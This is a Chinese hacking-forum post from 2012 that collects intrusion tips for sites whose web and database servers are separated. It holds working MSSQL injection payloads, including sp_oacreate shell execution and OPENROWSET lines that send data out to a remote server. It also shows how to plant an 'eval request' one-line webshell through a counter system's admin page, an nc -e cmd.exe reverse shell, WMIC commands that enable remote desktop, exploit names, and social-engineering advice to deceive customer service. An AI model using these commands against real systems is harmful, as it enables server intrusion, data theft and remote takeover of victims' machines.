找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3349|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
8 N6 h# a; a* W
$ S. c6 {5 g1 z- @; I* N2 R
$ F) A7 F, X: [" p$ Z- rSA点数据库分离搞法+语句:
4 r# B+ h' e: q: [) P
6 n4 V* k& Q; u; [, U注射点不显错,执行下面三条语句页面都返回正常。
( p: V9 M; n; }& Nand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')5 x5 h7 c& j$ z1 D  m$ R
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask'), ?8 {, w  _* d0 x) u
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
4 P5 A' D- B& `' a可以列目录,判断系统为2000,web与数据库分离
' \' R* f! [8 _# g" z2 u9 U5 }/ f遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。  }: \2 I+ p' q0 b
在注射点上执行
0 l" _' q- f7 X' Z+ t5 k, a4 E" Jdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
7 O& J0 O* }8 ~$ a5 A5 k页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP) D( i# x3 x& R5 i, x$ k
还有我用NC监听得其他端口都没有得到IP。3 i, P8 m4 u( Q% h+ k. p

+ _% R6 t4 S1 ?- s- x+ i通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
! z& i. x* @; K* U, ^+ l1 K'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--0 c) U5 K- A: U/ A& z, u. G

; R' j8 z( x$ K, q;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--) B9 ~# i5 o8 g$ }" k0 l

% B) l7 G2 x* t$ [现在就猜想是不是数据库是内网而且不能连外网。( `1 f9 m8 G" [- M' ?, ~  P" W$ c

- @  A* l( K$ l  F' v% O- t
" ~2 {  o3 c$ Q8 y, n) Jaccess导出txt文本代码
% o! t  W! J, q# NSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
6 {  o0 p2 N3 I4 k9 D
& \9 h; y( G+ L! g# W' i
% O! F& ?2 D( y0 N+ b+ z9 \7 E4 p% r; ~( r5 y* [* n: f; U  s8 d
自动跳转到指定网站代码头/ b1 p; Y( D- I- R
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
$ D) C! y! z9 O) I& {0 Z; M4 [' i2 k! u2 ~8 ]
0 w6 Q* D) F; }% [% v3 J
入侵java or jsp站点时默认配置文件路径:
, S6 i' f) r, Y& n3 g\web-inf\web.xml
, Y# h2 u6 y$ Ttomcat下的配置文件位置:
( n  G6 M8 C2 A6 v4 L, s\conf\server.xml            (前面加上tomcat路径)8 e8 l8 S% R: o8 W
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml( W% |3 O; D6 ^7 ?" ^
/ |$ l  k: Z: L' Z6 c! o) A: k3 K% R

8 C0 p: W5 V0 G) G1 F( Z7 u. j$ \$ K( }5 t6 O
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
& A: x" I2 S7 j- f  x! n-1%23# p" P0 \7 E7 f; y3 j
> 1 u# I" D' I* q: |: B0 e
<! t& T/ b% h* e" p8 N2 e2 h. L
1'+or+'1'='1
8 x% A1 Z5 O; |& A8 ?6 s8 n$ gid=8%bf/ K+ T( Z' K3 [' }

! t& I# g) T# p* ~' a8 ?/ R全新注入点检测试法:$ K$ r) L0 G/ Z; o
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。5 ?: O/ S& G3 d  j! E, S5 W. t
3 Z2 Y# z4 B6 q. v8 c
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。6 k5 D8 A$ |3 a- ?: t# o

( A: @1 ?: G) C搜索型注入判断方法:- V& q# u, {: w
北京%' and '1'='1' and '%'='
! c% x( d- V, _. |: w& @* w' B$ |3 d北京%' and '1'='2' and '%'='& h- R# P7 }  q' J2 ~
8 a6 ?& j7 N3 T& g, X+ J- c3 t
' Q9 ]; J  Q( W
COOKIES注入:: S+ u1 D% @0 Y0 }+ }4 ~9 d
6 H) Y3 @/ K* s
javascript:alert(document.cookie="id="+escape("51 and 1=1"));
# @( {6 E% r* D4 S7 T2 j# s6 L' a
8 F9 S8 R$ m$ d; I: R# k3 X2000专业版查看本地登录用户命令:
8 o5 S( R3 c% @, ^net config workstation- [' h* W( `/ |, m+ w8 f

# x: }! e' a. @5 j
9 h# p5 K+ o% o% S4 t1 j+ Z, H2003下查看ipsec配置和默认防火墙配置命令:
; b- D( x3 a7 b! T3 x6 Mnetsh firewall show config
3 v% j5 {8 v/ ~6 F4 ?netsh ipsec static show all
' p9 L0 B9 ]7 i2 T1 f+ [9 I& \/ W0 M; V
不指派指定策略命令:* N% f4 `5 U1 l7 p1 _
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)9 p( s7 @0 B1 C2 W2 t1 C% p1 a- @
netsh ipsec static show policy all  显示策略名
, M+ s2 T1 ^; m, a4 I+ M; g; `  v, j* X( @

  k; N$ \! j7 k' Z猜管理员后台小技巧:
$ Q( C+ F4 U; u. Dadmin/left.asp
% _% {: Z0 l% e" h% zadmin/main.asp
# F2 z. m, Z+ S3 c5 uadmin/top.asp" y- C) z' A) R
admin/admin.asp 0 S/ ?+ C: f- N. H9 t' I5 o# h/ @
会现出菜单导航,然后迅雷下载全部链接
3 r% W" t3 M+ @- c8 \  L8 U8 S
) N3 d0 c0 E5 L, @( a' K0 D% E5 H" h
社会工程学:- e9 Z1 ^6 k) R; i# L7 m* A
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人: a& D  }% @' y% F. a4 [! p
然后去骗客服
  Y) s. e7 k& M) z5 ~: i7 t
* J  t$ `  [, C4 |% n5 ~2 \- D3 b
6 P2 X; ~+ |  `- {统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
& ^* Q& ~/ m+ p2 r) r1 F查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, , @  T+ ?1 D( f2 D7 G: @4 k# V
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
/ C5 G5 p% j9 W6 Y9 `' O5 U' v# \7 a# @; s

/ I6 N  M7 u6 a8 i+ u8 ?( R$ ]; V: R
8 o% d/ A, {8 O" j0 y  `! Z6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)9 E6 r- M. N/ Z7 i% A- j/ @0 [% W
! g6 F5 O% t$ X+ D8 D7 l1 b
. K& e# f( D) C# z

4 O' G) L; W( D! f2 [' X; D4 I$ QCMD加密注册表位置' K* @0 X& Q# g+ p4 |% m: N
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
# C) ]  n+ B. OAutoRun2 i* _5 {/ j. s5 c0 f, \

0 H* l6 i* i/ Y8 w2 P% Y(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor2 k. L2 |( q( `( z/ V: R" P) B
AutoRun
1 O3 A( E0 F+ y: d
0 }- D- U! ~8 E  D' }
: Q8 Z; y  v+ a  d) R4 y在找注入时搜索Hidden,把他改成test0 p- i" g1 j$ c9 r4 m5 q6 N

7 ?6 u; _  i6 M  P" U( j6 y) S! r. k! Y0 G
9 D' @- l! E4 p5 b* c$ ]
mstsc /v:IP /console 1 K$ L3 T. \  A% B0 i6 U( R' k
8 A5 [% d% f8 Z6 B- @8 G( y9 ?5 K

/ E7 w; J# h- Q' h一句话开3389:
% q, T& p6 ]% S
4 j! P* I3 W5 {7 B最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  3 @% H* t# S! @- d0 u
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.* |; {( Z/ ~, f2 R+ P, @- A
0 `$ P7 ?4 M) [* ~
8 r& J% _$ p: A' [2 ^
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
& Z" F. q4 G3 N2 v+ f8 a! iInsert into admin(user,pwd) values('test','test'). s. p0 T! G4 r( J: g

( b$ a$ V  \+ M& k# E5 |# H
: j2 {7 \+ U' UNC反弹
$ X' t# ~: N# }( _( ]2 J5 D先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
5 Y" Y  ~# s# r' O- W3 W; d然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)* d' Y8 C; r$ p0 a0 W0 C
5 A1 }" J3 Y4 a; S) Y/ S& }
+ E# I3 d" ?0 q$ ], x
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题& W' J  N8 U0 }# L7 E2 y; u0 Q

' h8 d. l4 h" h1 j/ n有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录0 M4 N0 j2 B; o) y6 w# B
例如:
" j% q$ m; t0 Z$ vsubst k: d:\www\ 用d盘www目录替代k盘
2 b$ v4 \; P" j. [0 tsubst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表